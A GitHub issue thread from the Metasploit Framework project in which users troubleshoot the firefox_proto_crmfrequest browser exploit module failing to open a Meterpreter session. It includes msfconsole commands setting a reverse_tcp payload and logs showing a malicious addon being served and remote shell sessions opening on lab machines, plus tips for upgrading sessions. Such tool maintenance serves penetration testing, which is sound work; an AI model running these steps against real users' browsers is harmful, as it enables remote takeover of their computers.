### ISSUE TITLE
firefox_proto_crmfrequest needs to be fixed, meterpreter session is not opening

### ISSUE THREAD

**Issue by paulhx** [rapid7/metasploit-framework#4636]
The title says it all.

If you set TARGET 1 and choose a meterpreter as the exploit's payload, no session is initiated. The MSF console stops at "Sending HTML". Nothing happens thereafter.

I tested it against a Win 7 and Win 8.1 machine, FF version 7 and 13.

**Comment by OJ** [comment]
The title doesn't say it all, nor does your description. It'd be great to see:

* Sample run of the exploit failing
* Full version numbers of FF (not just major)
* Full version numbers of Windows  (including SP/patch levels)
* Architecture of the browser and OS (x86 vs x64)
* The payload that you've chosen
* Details of things such as firewalls, WAFs, AV, or anything that could impede the attack

Cheers!

**Comment by paulhx** [comment]
Hi OJ,

The Win 7 and Win 8.1 are both x86.

The exploit is supposed to work from version 5 to 15 of Firefox, so testing it with the versions 7 and 13 should suffice. There are two other excellent FF exploits, for versions 15-22 and 22-27, and they are working just fine.

This shouldn't be difficult to test, simply run the exploit <b>firefox_proto_crmfrequest</b> choosing windows/meterpreter/reverse_tcp as the payload and open it from a vulnerable FF browser.

It's not working here.

**Comment by joevennix** [comment]
> There are two other excellent FF exploits

Hey thanks!

I can look at this sometime this week. Until then, you might try `target 0` (the xpcom payload) and then upgrade to meterpreter with `sessions -u` or `exploits/firefox/local/exec_shellcode` local exploit module to run shellcode from the xpcom payload.

**Comment by joevennix** [comment]
Hrm, I get a meterpreter session without incident:

	msf exploit(firefox_proto_crmfrequest) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
	msf exploit(firefox_proto_crmfrequest) > [*] 10.10.9.82       firefox_proto_crmfrequest - Gathering target information.
	[*] 10.10.9.82       firefox_proto_crmfrequest - Sending response HTML.
	[*] 10.10.9.82       firefox_proto_crmfrequest - Sending HTML
	[*] 10.10.9.82       firefox_proto_crmfrequest - Sending the malicious addon
	[*] Sending stage (770048 bytes) to 10.10.9.82
	[*] Meterpreter session 1 opened (10.10.9.82:4444 -> 10.10.9.82:50830) at 2015-02-02 17:28:49 -0600

This was on Firefox version 11.0, Windows 7 x86.

@paulhx can you tell me if anything interesting shows up in your Browser Console? (ctrl-shift-J to bring up Firefox's Browser Console, this is a different thing than the Web Console, as it catches privileged exceptions)

**Comment by joevennix** [comment]
My HEAD is at `54a5dd69a9c661c896fbc5780dff6eca27c48c12`, if it matters.

**Comment by joevennix** [comment]
@wchen-r7 would you mind double-checking my verification that this problem is fixed? It worked for me 14 days ago on master.

**Comment by wchen-r7** [comment]
I will do that later tonight.

**Comment by wchen-r7** [comment]
@joevennix @paulhx, works fine for me:

```
msf exploit(firefox_proto_crmfrequest) > set target 1
target => 1
msf exploit(firefox_proto_crmfrequest) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
msf exploit(firefox_proto_crmfrequest) > [*] Using URL: http://0.0.0.0:8181/18pprwLWJN
[*]  Local IP: http://192.168.1.64:8181/18pprwLWJN
[*] Server started.
[*] 192.168.1.145    firefox_proto_crmfrequest - Gathering target information.
[*] 192.168.1.145    firefox_proto_crmfrequest - Sending response HTML.
[*] 192.168.1.145    firefox_proto_crmfrequest - Sending HTML
[*] 192.168.1.145    firefox_proto_crmfrequest - Sending the malicious addon
[*] Sending stage (770048 bytes) to 192.168.1.145
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.145:49262) at 2015-02-17 00:08:41 -0600
```

**Comment by joevennix** [comment]
Alright, I'm going to close this then. @paulhx if you still experience the issue please reopen with a set of steps so we can verify.

**Comment by paulhx** [comment]
@joevennix 

I have had no success so far. As I said, all the other "excellent" FF exploits are working fine.

After accessing the exploit page, I opened the Browser Console (ctrl+shift+j) and it shows 4 errors: http://i.imgur.com/naR107Q.png

You said:
"My HEAD is at 54a5dd69a9c661c896fbc5780dff6eca27c48c12, if it matters"

What does that mean? 

By the way, here's all the released versions of "firefox_proto_crmfrequest":

https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

Tried all the most recent ones without success. It stops on "Sending HTML":

Gathering target information.
Sending response HTML.
Sending HTML

I tried on WinXP, Win7, Win8 and varying versions of FF 5~15.
